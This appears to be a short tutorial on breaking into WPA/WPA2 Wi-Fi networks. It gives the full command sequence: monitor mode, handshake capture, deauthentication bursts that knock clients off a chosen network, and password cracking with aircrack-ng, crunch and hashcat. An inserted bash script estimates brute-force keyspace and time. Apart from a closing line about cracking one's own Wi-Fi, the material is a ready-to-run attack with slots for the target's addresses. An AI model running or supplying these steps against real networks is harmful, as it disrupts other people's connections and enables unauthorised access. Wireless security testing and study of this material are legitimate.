Get Handshake
install needed dependencies
sudo apt install aircrack-ng crunch -y # optionally "hashcat"
set your interface to monitor mode
sudo airmon-ng check kill # kill processes (NetworkManager, wpa_supplicant) that would interfere with monitor mode
sudo airmon-ng start wlan0 # set interface to monitor mode; on most systems it is renamed to wlan0mon, use that name in the commands below if so
gather network packets
sudo airodump-ng wlan0 # note the BSSID and channel of the target network
sudo airodump-ng --bssid ? --channel ? --write hash wlan0 # writes hash-01.cap; keep it running until "WPA handshake:" appears in the header line
force clients to reconnect to the target network
sudo aireplay-ng -0 2 -a ? -c ? wlan0 # -0 2 -> send 2 deauth bursts, -a -> AP MAC, -c -> client MAC (run in a second terminal while airodump-ng is still capturing)
Crack the hash file via dictionary attack (cpu, aircrack-ng)
sudo aircrack-ng hash-01.cap -w /path/to/the/dictionary # aircrack-ng first confirms it found a handshake ("1 handshake") before trying candidates
get a wordlist (e.g. rockyou.txt.gz)
Kali Linux ships rockyou at /usr/share/wordlists/rockyou.txt.gz
decompress it on Kali Linux
cd /usr/share/wordlists/
sudo gzip -d rockyou.txt.gz
cracking the hash with rockyou
sudo aircrack-ng hash-01.cap -w /path/to/the/dictionary # e.g. /usr/share/wordlists/rockyou.txt
Crack the hash via brute force (cpu, crunch / aircrack-ng)
generate 8- to 10-character passwords from the characters "abcdefgABC123?" and pipe them straight into aircrack-ng
crunch 8 10 'abcdefgABC123?' | sudo aircrack-ng -e wifiname -w - /path/to/the/hash/file # -w - reads candidates from stdin, -e selects the network by its ESSID; quote the charset so the shell does not expand the "?"
Crack the hash via dictionary attack (gpu, hashcat)
convert the cap file from airodump-ng (hash-01.cap) to the hc22000 format hashcat expects, either with hashcat's cap2hashcat online converter (https://hashcat.net/cap2hashcat/) or offline with hcxpcapngtool from the hcxtools package
hashcat -m 22000 hash.hc22000 rockyou.txt
Crack the hash file via brute force (gpu, hashcat)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d # -a 3 -> mask attack; this mask tries every 8-digit numeric password
hashcat mask:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s =  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ (starts with a space, 33 characters in total)
?a = ?l?u?d?s
?b = 0x00 - 0xff
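Before starting either brute-force variant above (the crunch pipe or the hashcat mask) it is worth knowing how many candidates you are committing to and how long that takes at your hash rate. The script below is an added example, not part of the original tutorial or of the hashcat or crunch projects: it computes the keyspace of a hashcat mask from the placeholder table above and of a crunch MIN MAX CHARSET run, and converts it to seconds. The 500 kH/s WPA2 rate is an assumed placeholder; measure your own with `hashcat -b -m 22000`.

```shell
#!/usr/bin/env bash
# Added example (not from the original tutorial): estimate the keyspace of a
# hashcat mask or a crunch charset and the time it takes at a given hash rate.
# The hash rate used in the demo is an assumed placeholder.

# Charset size behind each built-in hashcat mask placeholder (?l ?u ?d ?s ?a ?b).
mask_charset_size() {
    case "$1" in
        l|u) echo 26 ;;     # a-z / A-Z
        d)   echo 10 ;;     # 0-9
        s)   echo 33 ;;     # space plus 32 printable punctuation characters
        a)   echo 95 ;;     # ?l?u?d?s
        b)   echo 256 ;;    # 0x00-0xff
        *)   echo "unknown placeholder ?$1" >&2; return 1 ;;
    esac
}

# Number of candidates a mask expands to, e.g. mask_keyspace '?d?d?d?d?d?d?d?d'.
# A literal '?' is written '??' in hashcat masks; any other literal character
# contributes exactly one possibility to its position.
mask_keyspace() {
    local mask="$1" total=1 i=0 c size
    while [ "$i" -lt "${#mask}" ]; do
        c="${mask:$i:1}"
        if [ "$c" = "?" ]; then
            i=$((i + 1))
            c="${mask:$i:1}"
            if [ "$c" = "?" ]; then
                size=1
            else
                size=$(mask_charset_size "$c") || return 1
            fi
        else
            size=1
        fi
        total=$((total * size))
        i=$((i + 1))
    done
    echo "$total"
}

# Number of candidates `crunch MIN MAX CHARSET` produces: the sum of
# |CHARSET|^len for every length from MIN to MAX.
crunch_keyspace() {
    local max="$2" n="${#3}" len="$1" total=0 p k
    while [ "$len" -le "$max" ]; do
        p=1; k=0
        while [ "$k" -lt "$len" ]; do p=$((p * n)); k=$((k + 1)); done
        total=$((total + p))
        len=$((len + 1))
    done
    echo "$total"
}

# Whole seconds needed to exhaust KEYSPACE at RATE hashes per second.
seconds_at_rate() { echo $(( $1 / $2 )); }

# Demo with an assumed 500 kH/s WPA2 rate (placeholder; measure yours).
RATE=500000
for m in '?d?d?d?d?d?d?d?d' '?u?l?l?l?l?d?d?d' '?a?a?a?a?a?a?a?a'; do
    ks=$(mask_keyspace "$m")
    echo "$m -> $ks candidates, $(seconds_at_rate "$ks" "$RATE") s"
done
ks=$(crunch_keyspace 8 10 'abcdefgABC123?')
echo "crunch 8 10 abcdefgABC123? -> $ks candidates, $(seconds_at_rate "$ks" "$RATE") s"
```

The numbers make the trade-off visible: the 8-digit numeric mask from the hashcat section is 10^8 candidates and finishes in minutes, while an all-`?a` 8-character mask is 95^8, about 6.6 quadrillion candidates, which at the same rate runs for centuries. Pick masks from what you know about the target's password policy, and prefer a dictionary first.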
That's it!
This is just a basic tutorial.
More about hashcat can be found here.
If you have questions left contact me at contact@phoenixthrush.com and have fun cracking your OWN WIFI!